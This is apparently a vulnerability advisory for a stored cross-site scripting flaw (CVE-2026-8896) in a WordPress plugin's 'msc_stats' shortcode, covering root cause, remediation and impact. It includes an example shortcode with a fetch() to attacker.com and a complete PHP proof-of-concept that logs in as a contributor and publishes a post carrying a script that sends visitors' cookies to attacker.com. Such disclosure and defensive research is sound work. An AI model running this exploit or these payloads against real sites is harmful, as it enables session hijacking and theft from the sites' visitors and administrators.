Atomic Edge analysis of CVE-2026-8896 (metadata-based): This vulnerability allows authenticated users with Contributor-level access or higher to inject arbitrary JavaScript into WordPress pages via the ‘msc_stats’ shortcode. The flaw exists in the MIR blocks and shortcodes plugin version 1.0.0. The CVSS score of 6.4 reflects a medium-to-high severity with network attack vector, low complexity, and potential for stored cross-site scripting that affects other users.
Root Cause: The root cause is insufficient input sanitization and output escaping on shortcode attributes like ‘title’ and ‘ready_animation_text’ within the msc_stats() rendering function. Based on the CWE-79 classification and description, Atomic Edge analysis infers that the plugin’s shortcode handler passes user-supplied attribute values directly into HTML output without applying WordPress escaping functions (e.g., esc_attr(), wp_kses_post(), or esc_html()). The ‘msc_stats’ shortcode likely builds HTML elements using string interpolation of these attributes. WordPress shortcode attributes are provided by users when inserting the shortcode into posts, and the plugin fails to sanitize or escape these values before rendering. This inference is based on the vulnerability description, as no source code diff is available for confirmation.
Exploitation: An attacker with Contributor-level access creates or edits a post containing the malicious shortcode. The shortcode structure would be: [msc_stats title=”alert(‘XSS’)” ready_animation_text=”fetch(‘https://attacker.com/steal?cookie=’+document.cookie)”]. When any user views the page, the injected JavaScript executes in their browser context. The attack affects both contributors and subscribers viewing the page. No specific AJAX endpoint or REST route is required because shortcode processing occurs when WordPress renders the post content.
Remediation: The plugin must sanitize shortcode attribute values before using them in HTML output. Atomic Edge analysis recommends using WordPress’s built-in functions: esc_attr() for HTML attribute contexts, esc_html() for plain text contexts, or wp_kses_post() for rich text contexts. The vulnerable attributes ‘title’ and ‘ready_animation_text’ should be processed through these escaping functions within the msc_stats() function. Plugin updates should implement proper input validation and output escaping for all shortcode attributes.
Impact: Successful exploitation enables stored cross-site scripting that persists in the WordPress database. An attacker can steal session cookies, redirect users to malicious sites, perform actions on behalf of administrators, or deploy further attacks like keylogging or defacement. The stored nature means the malicious script executes for every visitor until the post or page is cleaned. Since Contributors can create posts with shortcodes, the vulnerability does not require elevated privileges beyond contributor access.
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-8896 - MIR blocks and shortcodes <= 1.0.0 - Authenticated (Contributor+) Stored XSS via Shortcode Attributes
// Configuration
$target_url = 'https://example.com'; // Change to the target WordPress site URL
$contributor_username = 'contributor_user'; // Change to a valid contributor username
$contributor_password = 'contributor_pass'; // Change to the contributor password
// Enable error reporting for debugging
error_reporting(E_ALL);
ini_set('display_errors', 1);
echo "[+] Atomic Edge XSS PoC for CVE-2026-8896n";
echo "[+] Target: $target_urlnn";
// Initialize cURL session
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cve_cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cve_cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36');
// Step 1: Login as contributor
$login_url = $target_url . '/wp-login.php';
$login_data = [
'log' => $contributor_username,
'pwd' => $contributor_password,
'wp-submit' => 'Log In',
'redirect_to' => $target_url . '/wp-admin/',
'testcookie' => '1'
];
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_URL, $login_url);
$response = curl_exec($ch);
if (strpos($response, 'Dashboard') === false && strpos($response, 'wp-admin') === false) {
echo "[!] Login might have failed. Check credentials.n";
exit(1);
}
echo "[+] Authenticated as contributor successfully.n";
// Step 2: Get the nonce for creating a new post
$new_post_url = $target_url . '/wp-admin/post-new.php';
curl_setopt($ch, CURLOPT_POST, false);
curl_setopt($ch, CURLOPT_URL, $new_post_url);
$new_post_page = curl_exec($ch);
// Extract the _wpnonce for post creation
preg_match('/name="_wpnonce" value="([a-f0-9]+)"/', $new_post_page, $nonce_matches);
if (!isset($nonce_matches[1])) {
echo "[!] Could not extract post nonce. Check if contributor has access to post editor.n";
exit(1);
}
$wp_nonce = $nonce_matches[1];
echo "[+] Got post nonce: $wp_noncen";
// Step 3: Create a new post with the XSS shortcode
// The payload injects a script that steals cookies
$xss_payload = "<script>new Image().src='https://attacker.com/steal.php?cookie='+document.cookie;</script>";
$post_data = [
'_wpnonce' => $wp_nonce,
'action' => 'editpost',
'post_type' => 'post',
'post_title' => 'Atomic Edge XSS Test - CVE-2026-8896',
'post_content' => '[msc_stats title="' . $xss_payload . '" ready_animation_text="' . $xss_payload . '"]',
'post_status' => 'publish',
'original_post_status' => 'auto-draft',
'post_author' => '1',
'user_ID' => '1'
];
$post_url = $target_url . '/wp-admin/post.php';
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_URL, $post_url);
$post_response = curl_exec($ch);
// Check if the post was created
if (strpos($post_response, 'Post published') !== false || strpos($post_response, 'message=') !== false) {
echo "[+] Malicious post created successfully.n";
} else {
echo "[!] Post creation might have failed. Check the response manually.n";
}
// Step 4: Get the post URL to confirm
preg_match('/<a[^>]+href="([^"]+)"[^>]*>View post</a>/i', $post_response, $post_url_matches);
if (isset($post_url_matches[1])) {
$post_permalink = $post_url_matches[1];
echo "[+] Post URL: $post_permalinkn";
echo "[+] The XSS will trigger when someone visits this URL.n";
} else {
// Try to find the post ID from the redirect
preg_match('/post=([0-9]+)/', $post_response, $post_id_matches);
if (isset($post_id_matches[1])) {
$post_id = $post_id_matches[1];
$post_permalink = $target_url . '/?p=' . $post_id;
echo "[+] Post ID: $post_idn";
echo "[+] Post URL: $post_permalinkn";
}
}
curl_close($ch);
echo "n[+] PoC completed. The stored XSS payload is now active.n";
?>
